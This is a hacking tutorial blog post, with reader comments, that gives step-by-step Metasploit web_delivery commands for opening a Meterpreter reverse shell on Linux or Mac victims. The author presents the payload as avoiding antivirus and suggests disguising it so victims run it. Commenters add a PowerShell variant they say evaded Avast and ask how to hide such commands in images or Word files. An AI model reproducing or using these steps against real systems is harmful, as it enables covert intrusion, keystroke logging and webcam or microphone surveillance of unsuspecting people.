Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 12 (Web Delivery for Linux or Mac)

Metasploit for the Aspiring Hacker, Part 12 (Web Delivery for Linux or Mac)

Welcome back, my budding hackers!

Metasploit, one of my favorite hacking/pentesting tools, has so many capabilities that even after my many tutorials on it, I have only scratched the surface of it capabilities. For instance, it can be used with Nexpose for vulnerability scanning, with Nmap for port scanning, and with its numerous auxiliary modules, nearly unlimited other hacking related capabilities.

Among the exploit modules, a category that we have not addressed are the web delivery exploits. These exploits enable us to open a web server on the attack system and then generate a simple script command that, when executed on the victim system, will open a Meterpreter shell on the target. This web delivery exploit can use Python, PHP, or the Windows PowerShell scripts.

Of course, it is your job to get the script on the target machine. This means that you will likely need to get physical access to the system or envelope the code into a seemingly innocuous-looking object that the victim will be enticed to execute.

In this tutorial, we will exploit a Linux or Mac system. Since both are UNIX-like systems, they both have built-in Python interpreters by default. If we can get the script command generated by this exploit on the target, we can have complete control of the system including keystroke logging, turning on the webcam, recording from the microphone, and reading or deleting any files on the system.

Let's get started.

Step 1: Open a Terminal

The first step, of course, is to fire up Kali and open a terminal.

Step 2: Start Metasploit & Load the Exploit

Next, start Metasploit by typing:

kali > msfconsole

This should open the msfconsole like that below.

Then we need to load the exploit:

msf > use exploit/multi/script/web_delivery

Set the IP of our attack system:

msf > set LHOST 192.168.181.153

And set the port we want to use:

msf > set LPORT 4444

Of course, I am using my private IP address in my lab, but if the target is outside your LAN, you will likely need to use your public IP and then port forward.

Step 3: Show Options

Now that we have the exploit loaded and ready to go, let's take a look at the options for this exploit. Type:

msf > show options

It looks like we have all the options set as we need. Now, let's get a bit more information on this exploit before we proceed. Type:

msf > info

As you can read above, this exploit starts a web server on our attack system and, when the command that is generated is executed on the target system, a payload is downloaded to victim. In addition, this attack does not write to disk, so it should not trigger the antivirus software on the victim's system.

Step 4: Start the Exploit

Our next step is to run the exploit. This starts the web server on our attack system and also generates a Python command that we can use to connect to this web server. Before we do that, though, we need to set the target to 0, selecting the Python exploit.

msf > set target 0

Now, we can type exploit:

msf > exploit

Notice the last thing this exploit writes is "Run the following command on the target machine" followed by the command we need to use. Copy this command.

Step 5: Run the Command on the Victim System

Next, take that command to the victim machine. In this case, I'm using an Ubuntu 14.04 system. You will need to precede the command with sudo as it requires root privileges.

Then hit Enter. When you return to your Kali system, you can see a Meterpreter has been started on the target system! We own that box!

Initially, the Meterpreter is running in the background. To bring it to the foreground, we can type:

msf > sessions -l

This then lists the "active sessions." Notice that this session ID is "1." We then can activate that session by typing:

msf > sessions - i 1

This then brings the Meterpreter session to the foreground and we get the meterpreter prompt! To control the system, we can run the Meterpreter commands or scripts, although most of the scripts are written for Windows systems.

Keep coming back, my budding hackers, as we continue to explore the most valuable skills of the 21st century—hacking!

18 Comments

Does anyone know of a windows-equivalent for this?
It would be really cool if you could do this in windows!

Why? You could always host the payloads on a windows based web server if you wanted. Or you could install metasploit on windows, but I wouldn't recommend it.

I believe Trinity asked if it was possible to get a meterpreter on Windows using this method. I guess it is possible as long as python is installed.

-Phoenix750

There is also a PowerShell option for the target and that will work on all recent versions of Windows.

Ahh, that makes more sense. I misunderstood the question.

There is a Windows Powershell option for this hack.

Awesome,the powershell works perfectly!
Solution:
set target 2 for PSH (PSH stand for powershell)
Default python meterpreter isn't compatible instead use windows meterpreter.
set payload windows/meterpreter/reversetcp
exploit/run and it gives you a powershell command to execute.
Tested on windows 8.1 pro with avast! installed and avast! did not catch it.

Hi! I've decided to start learning how to hack, so my first thing will be to learn some Linux basics. My question is will I have difficulties with mastering Kali if taking info from BackTrack tutorials? What shall I do? Should I start from BT or it doesn't really matter? Thank you!

No you will not have difficulties because kali is a newer version of backtrack, though kali has new stuff .

i guess backtack can gain you some good experience, but if you just wanna learn linux basics doesnt matter if its Kali or BackTrack.

D3ATH

Thanks for the quick respond!

I think it is possible with this exploit . instead of choosing target 0 , which is for python , we select windows command shell(maybe target 1) . i will let you know because i didn't try it yet

OTW,can we write a small program , when vitcim execute it,it will write that pyhton command line in victim's mac secretly?Or even bind the program with a pic which when victim open to see it (

not download),it will execute itself secretly?

Hey Occupy,

Im right now doing an apprenticeship in IT, an am in my third year.
Could you write something about the .Locky Virus?
I had to deal with it at a custumers office witch was infectet, and all files were decrypted.
I found the virus un the registry.

I think it would be interseting how such a virus is made, hidden in a ms word file and sent by email without the spamfilter detecting it.

I would appreciate an answer, keep it up.

File "<string>", line 1, in <module>
File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python2.7/urllib2.py", line 437, in open
response = meth(req, response)
File "/usr/lib/python2.7/urllib2.py", line 550, in httpresponse
'http', request, response, code, msg, hdrs)
File "/usr/lib/python2.7/urllib2.py", line 475, in error
return self.
callchain(args)
File "/usr/lib/python2.7/urllib2.py", line 409, in
callchain
result = func(args)
File "/usr/lib/python2.7/urllib2.py", line 558, in http
errordefault
raise HTTPError(req.get
fullurl(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: File not found
I resieveie this at the victim machine

Hey Occupytheweb,

Good article here, although I think I'm missing something. For step 5, it says to run that python snippet on the victim's machine. Isn't the whole point of this tutorial to show how to get into the victims machine? You also say we need to put sudo before that command - so we need the root password of the victim's machine we're going to attack....if we have that info then why even attack it? I'm just a little unsure as to how we get a victim to run a payload on their machine. For windows, sure that might be easy since opening a .exe file is just a double click - but on other machines like Linux and even OSX payloads written in bash need things to be done like chmod +x first before they can even be run and commands like that also need root privileges. Can you point me to some relevant info?

There was a video on Hak5 which demonstrated the use of a rubber ducky to get a reversetcp on a machine with physical access and i was surprised on the method they used with web delivery to get the payload downloaded. Now this post explains it very clearly. Thank you for the awesomness OTW ^^

So, how we can use this exploit for a victim with Windows?

Share Your Thoughts

  • Hot
  • Latest